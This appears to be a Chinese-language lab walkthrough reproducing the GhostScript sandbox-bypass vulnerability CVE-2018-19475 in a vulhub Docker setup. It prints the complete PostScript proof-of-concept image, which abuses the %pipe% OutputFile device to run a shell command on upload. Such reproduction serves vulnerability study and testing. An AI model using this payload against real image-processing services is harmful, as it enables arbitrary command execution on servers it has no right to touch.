漏洞描述:
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
参考链接:
https://blog.semmle.com/ghostscript-CVE-2018-19475/
https://bugs.ghostscript.com/show_bug.cgi?id=700153/
环境说明:
使用腾讯云轻量服务器安装vulhub
系统:ubuntu20.04
1、进入vulhub/ghostscript/CVE-2018-16509目录,使用命令启动漏洞环境:
docker-compose up -d
done表示环境已开启 。
2、使用docker-compose ps 查看漏洞存在的端口:
可以看到相关端口是8080。
3、通过访问your-ip:port可以看到有文件上传的路径:
4、下载poc:
访问poc地址:https://github.com/vulhub/vulhub/blob/master/ghostscript/CVE-2018-19475/poc.png以下载poc.png,poc.png内容为:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
5、上传poc.png,点击“提交查询”,执行命令id > /tmp/success && cat /tmp/success